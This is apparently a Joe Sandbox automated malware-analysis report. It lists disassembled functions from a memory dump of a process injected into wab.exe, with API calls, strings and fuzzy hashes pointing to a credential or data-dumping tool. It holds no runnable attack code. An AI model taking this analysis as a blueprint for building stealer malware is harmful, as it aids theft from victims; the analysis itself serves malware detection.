                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                                                              • wcscpy.MSVCRT ref: 0040A107
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1331804452-0
                                                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                              • String ID: advapi32.dll
                                                                                              • API String ID: 2012295524-4050573280
                                                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                              • <%s>, xrefs: 004100A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_snwprintf
                                                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                              • API String ID: 3473751417-2880344631
                                                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscat$_snwprintfmemset
                                                                                              • String ID: %2.2X
                                                                                              • API String ID: 2521778956-791839006
                                                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfwcscpy
                                                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                                                              • API String ID: 999028693-502967061
                                                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2350177629-0
                                                                                              • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                              • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                              • API String ID: 2221118986-1606337402
                                                                                              • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                              • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                              • String ID:
                                                                                              • API String ID: 265355444-0
                                                                                              • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                              • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                              • memset.MSVCRT ref: 0040C439
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                              • memset.MSVCRT ref: 0040C4D0
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                              • String ID:
                                                                                              • API String ID: 1973883786-0
                                                                                              • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                              • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004116FF
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                              • API String ID: 2618321458-3614832568
                                                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004185FC
                                                                                              • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@AttributesFilememset
                                                                                              • String ID:
                                                                                              • API String ID: 776155459-0
                                                                                              • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                              • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                              • malloc.MSVCRT ref: 00417524
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2308052813-0
                                                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PathTemp$??3@
                                                                                              • String ID: %s\etilqs_$etilqs_
                                                                                              • API String ID: 1589464350-1420421710
                                                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040FDD5
                                                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                              • API String ID: 1775345501-2769808009
                                                                                              • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                              • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcscpy.MSVCRT ref: 0041477F
                                                                                              • wcscpy.MSVCRT ref: 0041479A
                                                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                                                              • String ID: General
                                                                                              • API String ID: 999786162-26480598
                                                                                              • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                              • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastMessage_snwprintf
                                                                                              • String ID: Error$Error %d: %s
                                                                                              • API String ID: 313946961-1552265934
                                                                                              • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                              • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: foreign key constraint failed$new$oid$old
                                                                                              • API String ID: 0-1953309616
                                                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                              • API String ID: 3510742995-272990098
                                                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: gj
                                                                                              • API String ID: 1297977491-4203073231
                                                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
